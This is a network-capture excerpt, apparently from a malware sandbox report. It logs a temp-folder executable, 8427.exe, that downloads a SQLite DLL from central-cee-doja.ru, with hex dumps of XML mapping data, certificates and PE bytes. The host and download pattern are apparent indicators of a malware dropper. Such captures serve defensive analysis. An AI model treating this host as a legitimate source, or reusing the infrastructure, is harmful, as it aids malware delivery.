20 3c Data Ascii: n Name="DATEDIFF" BuiltIn="true"> <ReturnType Type="Int32" /> <Parameter Name="datepart" Type="String" Mode="In" /> <Parameter Name="startdate" Type="String" Mode="In" /> <Parameter Name="enddate" Type="DateTime" Mode="In" /> <
2023-11-18 09:02:36 UTC	544	IN	Data Raw: 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 44 41 54 45 50 41 52 54 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 49 6e 74 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 64 61 74 65 70 61 72 74 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 64 61 74 65 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d Data Ascii: "In" /> </Function> <Function Name="DATEPART" BuiltIn="true"> <ReturnType Type="Int32" /> <Parameter Name="datepart" Type="String" Mode="In" /> <Parameter Name="date" Type="String" Mode="In" /> </Function> <Function Name=
2023-11-18 09:02:36 UTC	548	IN	Data Raw: 20 20 20 2d 2d 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 43 45 49 4c 49 4e 47 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 49 6e 74 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 61 72 67 22 20 54 79 70 65 3d 22 49 6e 74 33 32 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 43 45 49 4c 49 4e 47 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 49 6e 74 36 34 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d Data Ascii: --> <Function Name="CEILING" BuiltIn="true"> <ReturnType Type="Int32" /> <Parameter Name="arg" Type="Int32" Mode="In" /> </Function> <Function Name="CEILING" BuiltIn="true"> <ReturnType Type="Int64" /> <Parameter Nam
2023-11-18 09:02:36 UTC	550	IN	Data Raw: 6f 61 74 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 73 3a 20 66 6c 6f 61 74 20 20 20 0a 20 20 20 20 20 20 20 20 2d 2d 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 45 58 50 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 44 6f 75 62 6c 65 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 61 72 67 22 20 54 79 70 65 3d 22 44 6f 75 62 6c 65 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 46 4c 4f 4f 52 28 20 61 72 67 20 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 72 67 3a 20 74 69 6e 79 69 6e 74 2c 20 73 6d 61 6c 6c Data Ascii: oat returns: float --> <Function Name="EXP" BuiltIn="true"> <ReturnType Type="Double" /> <Parameter Name="arg" Type="Double" Mode="In" /> </Function> ... FLOOR( arg ) arg: tinyint, small
2023-11-18 09:02:36 UTC	554	IN	Data Raw: 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 6c 65 6e 67 74 68 22 20 54 79 70 65 3d 22 49 6e 74 33 32 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 66 75 6e 63 74 69 6f 6e 22 20 54 79 70 65 3d 22 49 6e 74 33 32 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 52 4f 55 4e 44 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 44 6f 75 62 6c 65 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 6e 75 6d 65 72 69 63 5f 65 78 70 72 65 73 73 69 6f 6e 22 20 54 Data Ascii: <Parameter Name="length" Type="Int32" Mode="In" /> <Parameter Name="function" Type="Int32" Mode="In" /> </Function> <Function Name="ROUND" BuiltIn="true"> <ReturnType Type="Double" /> <Parameter Name="numeric_expression" T
2023-11-18 09:02:36 UTC	557	IN	Data Raw: 4e 61 6d 65 3d 22 4e 61 6d 65 22 20 2f 3e 0a 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 4f 72 64 69 6e 61 6c 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 4f 72 64 69 6e 61 6c 22 20 2f 3e 0a 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 49 73 4e 75 6c 6c 61 62 6c 65 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 49 73 4e 75 6c 6c 61 62 6c 65 22 20 2f 3e 0a 20 20 20 20 20 20 3c 63 73 3a 43 6f 6d 70 6c 65 78 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 43 6f 6c 75 6d 6e 54 79 70 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 54 79 70 65 4e 61 6d 65 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 54 79 70 65 4e 61 Data Ascii: Name="Name" /> <cs:ScalarProperty Name="Ordinal" ColumnName="Ordinal" /> <cs:ScalarProperty Name="IsNullable" ColumnName="IsNullable" /> <cs:ComplexProperty Name="ColumnType"> <cs:ScalarProperty Name="TypeName" ColumnName="TypeNa
2023-11-18 09:02:36 UTC	561	IN	Data Raw: 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 4d 61 78 4c 65 6e 67 74 68 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 52 65 74 75 72 6e 4d 61 78 4c 65 6e 67 74 68 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 50 72 65 63 69 73 69 6f 6e 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 52 65 74 75 72 6e 50 72 65 63 69 73 69 6f 6e 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 44 61 74 65 54 69 6d 65 50 72 65 63 69 73 69 6f 6e 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 52 65 74 75 72 6e 44 61 74 65 54 69 6d 65 50 72 65 63 69 73 69 6f 6e 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 63 73 Data Ascii: <cs:ScalarProperty Name="MaxLength" ColumnName="ReturnMaxLength" /> <cs:ScalarProperty Name="Precision" ColumnName="ReturnPrecision" /> <cs:ScalarProperty Name="DateTimePrecision" ColumnName="ReturnDateTimePrecision" /> <cs
2023-11-18 09:02:36 UTC	564	IN	Data Raw: 79 20 4e 61 6d 65 3d 22 49 64 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 49 64 22 20 2f 3e 0a 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 43 61 74 61 6c 6f 67 4e 61 6d 65 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 43 61 74 61 6c 6f 67 4e 61 6d 65 22 20 2f 3e 0a 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 53 63 68 65 6d 61 4e 61 6d 65 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 53 63 68 65 6d 61 4e 61 6d 65 22 20 2f 3e 0a 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 4e 61 6d 65 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 4e 61 6d 65 22 20 2f 3e 0a 20 20 20 20 3c 2f 63 73 3a 45 6e 74 69 74 79 53 65 74 4d 61 70 70 69 6e Data Ascii: y Name="Id" ColumnName="Id" /> <cs:ScalarProperty Name="CatalogName" ColumnName="CatalogName" /> <cs:ScalarProperty Name="SchemaName" ColumnName="SchemaName" /> <cs:ScalarProperty Name="Name" ColumnName="Name" /> </cs:EntitySetMappin
2023-11-18 09:02:36 UTC	568	IN	Data Raw: 3c 63 73 3a 45 6e 74 69 74 79 54 79 70 65 4d 61 70 70 69 6e 67 20 54 79 70 65 4e 61 6d 65 3d 22 53 74 6f 72 65 2e 55 6e 69 71 75 65 43 6f 6e 73 74 72 61 69 6e 74 22 20 3e 0a 20 20 20 20 20 20 20 20 3c 63 73 3a 4d 61 70 70 69 6e 67 46 72 61 67 6d 65 6e 74 20 53 74 6f 72 65 45 6e 74 69 74 79 53 65 74 3d 22 53 56 69 65 77 43 6f 6e 73 74 72 61 69 6e 74 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 49 64 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 49 64 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 4e 61 6d 65 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 4e 61 6d 65 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 63 73 3a Data Ascii: <cs:EntityTypeMapping TypeName="Store.UniqueConstraint" > <cs:MappingFragment StoreEntitySet="SViewConstraints"> <cs:ScalarProperty Name="Id" ColumnName="Id" /> <cs:ScalarProperty Name="Name" ColumnName="Name" /> <cs:
2023-11-18 09:02:36 UTC	572	IN	Data Raw: 43 6f 6e 73 74 72 61 69 6e 74 43 6f 6c 75 6d 6e 73 22 20 54 79 70 65 4e 61 6d 65 3d 22 53 74 6f 72 65 2e 54 61 62 6c 65 4f 72 56 69 65 77 43 6f 6e 73 74 72 61 69 6e 74 43 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 3c 63 73 3a 45 6e 64 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 43 6f 6e 73 74 72 61 69 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 49 64 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 43 6f 6e 73 74 72 61 69 6e 74 49 64 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 63 73 3a 45 6e 64 50 72 6f 70 65 72 74 79 3e 0a 20 20 20 20 20 20 3c 63 73 3a 45 6e 64 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 43 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 Data Ascii: ConstraintColumns" TypeName="Store.TableOrViewConstraintColumn"> <cs:EndProperty Name="Constraint"> <cs:ScalarProperty Name="Id" ColumnName="ConstraintId" /> </cs:EndProperty> <cs:EndProperty Name="Column"> <cs:ScalarProp
2023-11-18 09:02:36 UTC	575	IN	Data Raw: 79 20 4e 61 6d 65 3d 22 43 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 49 64 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 54 6f 43 6f 6c 75 6d 6e 49 64 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 63 73 3a 45 6e 64 50 72 6f 70 65 72 74 79 3e 0a 20 20 20 20 3c 2f 63 73 3a 41 73 73 6f 63 69 61 74 69 6f 6e 53 65 74 4d 61 70 70 69 6e 67 3e 0a 0a 20 20 20 20 3c 63 73 3a 41 73 73 6f 63 69 61 74 69 6f 6e 53 65 74 4d 61 70 70 69 6e 67 20 4e 61 6d 65 3d 22 46 72 6f 6d 56 69 65 77 46 6f 72 65 69 67 6e 4b 65 79 43 6f 6c 75 6d 6e 73 22 20 53 74 6f 72 65 45 6e 74 69 74 79 53 65 74 3d 22 53 56 69 65 77 46 6f 72 65 69 67 6e 4b 65 79 73 22 20 54 79 70 65 4e 61 6d 65 3d 22 53 74 6f 72 65 2e 46 72 6f 6d Data Ascii: y Name="Column"> <cs:ScalarProperty Name="Id" ColumnName="ToColumnId" /> </cs:EndProperty> </cs:AssociationSetMapping> <cs:AssociationSetMapping Name="FromViewForeignKeyColumns" StoreEntitySet="SViewForeignKeys" TypeName="Store.From
2023-11-18 09:02:36 UTC	579	IN	Data Raw: 00 30 21 30 09 06 05 2b 0e 03 02 1a 05 00 04 14 99 65 26 d7 c9 e8 76 61 13 07 44 be 3f 37 0f 19 ae 9f 33 c1 a0 82 0e d3 30 82 06 b0 30 82 04 98 a0 03 02 01 02 02 10 08 ad 40 b2 60 d2 9c 4c 9f 5e cd a9 bd 93 ae d9 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0c 05 00 30 62 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 15 30 13 06 03 55 04 0a 13 0c 44 69 67 69 43 65 72 74 20 49 6e 63 31 19 30 17 06 03 55 04 0b 13 10 77 77 77 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 31 21 30 1f 06 03 55 04 03 13 18 44 69 67 69 43 65 72 74 20 54 72 75 73 74 65 64 20 52 6f 6f 74 20 47 34 30 1e 17 0d 32 31 30 34 32 39 30 30 30 30 30 30 5a 17 0d 33 36 30 34 32 38 32 33 35 39 35 39 5a 30 69 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 17 30 15 06 03 55 04 0a 13 0e 44 69 67 69 43 65 72 74 2c 20 49 Data Ascii: 0!0+e&vaD?7300@`L^0*H0b10UUS10UDigiCert Inc10Uwww.digicert.com1!0UDigiCert Trusted Root G40210429000000Z360428235959Z0i10UUS10UDigiCert, I
2023-11-18 09:02:36 UTC	584	IN	Data Raw: e4 fe 6a 50 d4 d7 a3 09 5d 8e 26 d7 46 f2 c9 f5 aa 57 e2 29 c1 93 23 8e 1c cd b4 c2 ab 8d 25 f7 73 a9 7d ae 79 59 49 cc e8 15 c3 72 9a af 4b 7c b2 4c 62 c1 c4 b7 7e 2c bb e3 b3 3b b0 0d 43 c3 e6 5c f4 05 65 c4 25 d6 81 e6 97 99 bb af 4e 47 a4 b2 dd 4a 20 0d 27 d2 71 10 79 d9 1b fe d7 81 33 3e 17 d2 d4 c9 ca bc 4a b4 a6 e3 66 77 3d cf b6 35 a9 6c 9a 39 03 e6 b7 f2 0e ec 90 e3 15 6b e1 d4 de 39 1e 29 e4 a5 8c 01 3e 7a 8c 8f cd e2 16 bf 48 8b cc 88 00 9d 70 8d 29 d7 50 b3 61 1f d5 6a 9d d5 1d b8 e6 22 fe 31 f9 be c5 b6 ca ed 6e 43 77 0d ab dc da 7b 62 22 01 cd a3 dc c7 db 77 c6 76 3e 96 2c ce ce 1b ce 02 9b de 67 bb aa 4e 26 62 30 bd 04 69 6b 00 25 5c 69 69 2a 66 a4 14 0f 62 fb 9c 8b cc 1c 0b 76 3e 8e 18 dd 52 04 96 17 4e af 58 4d e6 5f a2 8e 1c 35 35 5b 5d Data Ascii: jP]&FW)#%s}yYIrK\|Lb~,;C\e%NGJ 'qy3>Jfw=5l9k9)>zHp)Paj"1nCw{b"wv>,gN&b0ik%\ii*fbv>RNXM_55[]
2023-11-18 09:02:36 UTC	587	IN	Data Raw: 89 38 61 4d 62 46 24 87 63 8c 91 52 2c af 29 89 e5 78 1f d6 0b 14 a5 80 d7 12 47 70 b3 75 d5 93 85 93 7e b6 92 67 fb 53 61 89 a8 f5 6b 96 c0 f4 58 69 0d 7c c8 01 b1 b9 28 75 b7 99 63 85 22 8c 61 ca 79 94 7e 59 fc 8c 0f e3 6f b5 01 26 b6 6c a5 ee 87 51 21 e4 58 60 9b ba 0c 2d 2b 6d a2 c4 7e bb c4 25 2b 47 02 08 7c 49 ae 13 b6 e1 7c 42 42 28 c6 18 56 cf 41 34 b6 66 5d b6 74 7b f5 56 33 22 2f 22 36 b2 4b a2 4a 95 d8 f5 a6 8e 52 31 82 02 86 30 82 02 82 02 01 01 30 81 86 30 72 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 15 30 13 06 03 55 04 0a 13 0c 44 69 67 69 43 65 72 74 20 49 6e 63 31 19 30 17 06 03 55 04 0b 13 10 77 77 77 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 31 31 30 2f 06 03 55 04 03 13 28 44 69 67 69 43 65 72 74 20 53 48 41 32 20 41 73 73 75 72 65 64 20 Data Ascii: 8aMbF$cR,)xGpu~gSakXi\|(uc"ay~Yo&lQ!X`-+m~%+G\|I\|BB(VA4f]t{V3"/"6KJR1000r10UUS10UDigiCert Inc10Uwww.digicert.com110/U(DigiCert SHA2 Assured
2023-11-18 09:02:36 UTC	591	IN	Data Raw: 41 31 2e 63 72 74 30 0c 06 03 55 1d 13 01 01 ff 04 02 30 00 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 02 01 00 c1 c5 88 1e 52 0c c5 47 85 58 65 15 84 80 69 e6 b2 2d 3e b5 b4 6b 93 10 28 75 da 6d d7 8a 3b 86 4b e8 75 95 68 26 00 1f 45 86 4f 80 25 fc 55 8b d2 5b 40 2f 55 45 19 c4 09 b6 1f 04 4f 64 50 db 02 39 5c db a9 bd 53 09 d9 c8 e1 f3 f1 ce 4a 32 7b cc e7 8f 68 3e 83 47 48 4c 82 0a ff 56 96 45 3d e8 d4 0b 9c c4 23 5e ca a0 b4 84 77 68 f1 98 8c a5 d4 90 8d d8 03 ed 0e 88 58 fe 54 16 67 a1 92 84 66 26 41 fc 78 37 b5 d9 aa d5 fb 50 da f4 c9 f1 c3 ae ba 7e b7 c7 b5 82 00 7c dd a7 6c 60 25 aa b7 f8 26 8a c0 51 b9 00 a9 00 cb cc d7 82 4b 8e 8f 8e fa ac be 2b 9b 4e 00 99 d4 d1 58 97 fb 19 a5 c4 b8 21 4a 71 5f 79 13 52 7c 43 58 51 33 14 81 ea c4 03 e4 Data Ascii: A1.crt0U00*HRGXei->k(um;Kuh&EO%U[@/UEOdP9\SJ2{h>GHLVE=#^whXTgf&Ax7P~\|l`%&QK+NX!Jq_yR\|CXQ3
2023-11-18 09:02:36 UTC	595	IN	Data Raw: fb 53 61 89 a8 f5 6b 96 c0 f4 58 69 0d 7c c8 01 b1 b9 28 75 b7 99 63 85 22 8c 61 ca 79 94 7e 59 fc 8c 0f e3 6f b5 01 26 b6 6c a5 ee 87 51 21 e4 58 60 9b ba 0c 2d 2b 6d a2 c4 7e bb c4 25 2b 47 02 08 7c 49 ae 13 b6 e1 7c 42 42 28 c6 18 56 cf 41 34 b6 66 5d b6 74 7b f5 56 33 22 2f 22 36 b2 4b a2 4a 95 d8 f5 a6 8e 52 31 82 02 a6 30 82 02 a2 02 01 01 30 81 86 30 72 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 15 30 13 06 03 55 04 0a 13 0c 44 69 67 69 43 65 72 74 20 49 6e 63 31 19 30 17 06 03 55 04 0b 13 10 77 77 77 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 31 31 30 2f 06 03 55 04 03 13 28 44 69 67 69 43 65 72 74 20 53 48 41 32 20 41 73 73 75 72 65 64 20 49 44 20 54 69 6d 65 73 74 61 6d 70 69 6e 67 20 43 41 02 10 0d 42 4a e0 be 3a 88 ff 60 40 21 ce 14 00 f0 dd 30 0d Data Ascii: SakXi\|(uc"ay~Yo&lQ!X`-+m~%+G\|I\|BB(VA4f]t{V3"/"6KJR1000r10UUS10UDigiCert Inc10Uwww.digicert.com110/U(DigiCert SHA2 Assured ID Timestamping CABJ:`@!0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	104.21.89.193	443	192.168.2.4	49745	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:34 UTC	398	OUT	GET /dlls/System.Data.SQLite.EF6.dll HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:02:35 UTC	398	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:35 GMT Content-Type: application/x-msdos-program Content-Length: 201528 Connection: close Last-Modified: Tue, 02 Nov 2021 17:44:38 GMT ETag: "31338-5cfd1d8ebcd80" Accept-Ranges: bytes CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2ewIx39srdRGGzxOMHak08TKHhzuul2RYw65y%2Fd%2FYsBA%2FX7ZLNT3fYMPKtundvnSkGP1qPsHJ%2FsaH%2B1UoBlY05tFqxWM2%2Fdjiwao000Z7AWMDOYb6AXiYSQFCaiWXKG21l26VPQB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f090cd8d9eb7f-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:35 UTC	399	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b6 70 81 61 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 c8 02 00 00 08 00 00 00 00 00 00 72 e7 02 00 00 20 00 00 00 00 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 c1 29 03 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELpa" 0r @)`
2023-11-18 09:02:35 UTC	400	IN	Data Raw: 00 0a 6f 28 00 00 0a 0d 2b 41 09 6f 29 00 00 0a 74 1b 00 00 01 08 2c 04 16 0c 2b 0c 06 72 39 00 00 70 6f 22 00 00 0a 26 25 6f 2a 00 00 0a 07 6f 25 00 00 0a 06 72 3f 00 00 70 6f 22 00 00 0a 26 6f 2b 00 00 0a 07 6f 25 00 00 0a 09 6f 13 00 00 0a 2d b7 de 0a 09 2c 06 09 6f 12 00 00 0a dc 08 2c 2a 07 16 8c a3 00 00 01 1f 0b 6f 73 01 00 06 13 04 06 11 04 6f 2c 00 00 0a 6f 22 00 00 0a 26 06 72 47 00 00 70 6f 22 00 00 0a 26 06 6f 26 00 00 0a 26 06 72 51 00 00 70 6f 22 00 00 0a 26 02 6f 2d 00 00 0a 07 6f 25 00 00 0a 06 72 5f 00 00 70 6f 2e 00 00 0a 26 06 02 07 02 6f 21 00 00 0a 16 28 07 00 00 06 03 07 6f 70 01 00 06 51 06 6f 2f 00 00 0a 2a 01 10 00 00 02 00 5f 00 4d ac 00 0a 00 00 00 00 13 30 05 00 6e 00 00 00 02 00 00 11 7e 01 00 00 04 73 20 00 00 0a 25 02 16 72 Data Ascii: o(+Ao)t,+r9po"&%oo%r?po"&o+o%o-,o,oso,o"&rGpo"&o&&rQpo"&o-o%r_po.&o!(opQo/*_M0n~s %r
2023-11-18 09:02:35 UTC	401	IN	Data Raw: ff de 6f 12 05 fe 16 0b 00 00 1b 6f 12 00 00 0a dc 0e 04 2c 37 02 72 71 01 00 70 6f 22 00 00 0a 26 02 72 ce 02 00 70 28 f2 00 00 06 6f 22 00 00 0a 26 02 72 3f 00 00 70 6f 22 00 00 0a 26 02 72 7d 01 00 70 6f 2e 00 00 0a 26 2b 26 72 da 02 00 70 09 2d 07 72 19 02 00 70 2b 06 09 6f 34 00 00 0a 06 6f 40 00 00 0a 28 41 00 00 0a 73 42 00 00 0a 7a 02 72 5f 00 00 70 6f 2e 00 00 0a 26 2a 00 01 10 00 00 02 00 0c 01 9b a7 01 0e 00 00 00 00 2e 20 00 01 00 00 80 01 00 00 04 2a 1e 02 28 44 00 00 0a 2a 13 30 02 00 14 00 00 00 07 00 00 11 73 45 00 00 0a 0a 02 06 6f 0c 00 00 06 06 6f 2f 00 00 0a 2a 22 02 03 6f 0a 00 00 06 2a 00 00 00 13 30 02 00 14 00 00 00 07 00 00 11 73 45 00 00 0a 0a 02 06 6f 0a 00 00 06 06 6f 2f 00 00 0a 2a 6a 02 7b 02 00 00 04 2d 0b 02 73 46 00 00 0a Data Ascii: oo,7rqpo"&rp(o"&r?po"&r}po.&+&rp-rp+o4o@(AsBzr_po.&. (D0sEoo/"o0sEoo/j{-sF
2023-11-18 09:02:35 UTC	402	IN	Data Raw: 00 11 00 00 00 0e 00 00 00 1d 00 00 00 14 00 00 00 17 00 00 00 1a 00 00 00 20 00 00 00 2b 21 17 2a 19 2a 18 2a 1c 2a 1d 2a 1e 2a 1f 0f 2a 1f 09 2a 1f 0a 2a 1f 0b 2a 1f 0c 2a 1f 0e 2a 1f 10 2a 72 cc 03 00 70 02 8c 1f 00 00 01 28 70 00 00 0a 73 71 00 00 0a 7a 00 13 30 04 00 2f 00 00 00 0f 00 00 11 02 6f 72 00 00 0a 03 16 12 00 6f 73 00 00 0a 2c 1c 06 6f 74 00 00 0a 2c 14 06 6f 75 00 00 0a 2d 0c 06 6f 74 00 00 0a a5 19 00 00 1b 2a 04 2a 72 02 6f 65 00 00 0a 74 7e 00 00 01 6f 76 00 00 0a 03 28 35 00 00 06 6f 77 00 00 0a 2a 1b 30 02 00 3a 00 00 00 10 00 00 11 02 6f 78 00 00 0a 0a 2b 19 06 6f 79 00 00 0a 0b 07 6f 7a 00 00 0a 03 28 7b 00 00 0a 2c 04 07 0c de 16 06 6f 13 00 00 0a 2d df de 0a 06 2c 06 06 6f 12 00 00 0a dc 14 2a 08 2a 00 00 01 10 00 00 02 00 07 00 Data Ascii: +!***********rp(psqz0/oros,ot,ou-otroet~ov(5ow0:ox+oyoz({,o-,o*
2023-11-18 09:02:35 UTC	404	IN	Data Raw: 00 11 02 03 6f 94 00 00 0a 28 7a 00 00 06 02 03 6f 95 00 00 0a 28 79 00 00 06 0a 06 60 2a 36 02 03 6f 96 00 00 0a 28 7c 00 00 06 2a 00 00 13 30 03 00 30 00 00 00 14 00 00 11 02 03 6f 97 00 00 0a 6f 98 00 00 0a 28 79 00 00 06 02 03 6f 99 00 00 0a 28 7c 00 00 06 0a 02 03 6f 9a 00 00 0a 28 77 00 00 06 0b 06 60 07 60 2a 13 30 03 00 1c 00 00 00 15 00 00 11 02 03 6f 90 00 00 0a 28 79 00 00 06 02 03 6f 91 00 00 0a 28 79 00 00 06 0a 06 60 2a 13 30 03 00 2b 00 00 00 14 00 00 11 02 03 6f 9b 00 00 0a 28 7a 00 00 06 02 03 6f 9c 00 00 0a 28 7a 00 00 06 0a 02 03 6f 9d 00 00 0a 28 79 00 00 06 0b 06 60 07 60 2a 00 13 30 03 00 2b 00 00 00 14 00 00 11 02 03 6f 9e 00 00 0a 28 79 00 00 06 02 03 6f 9f 00 00 0a 28 79 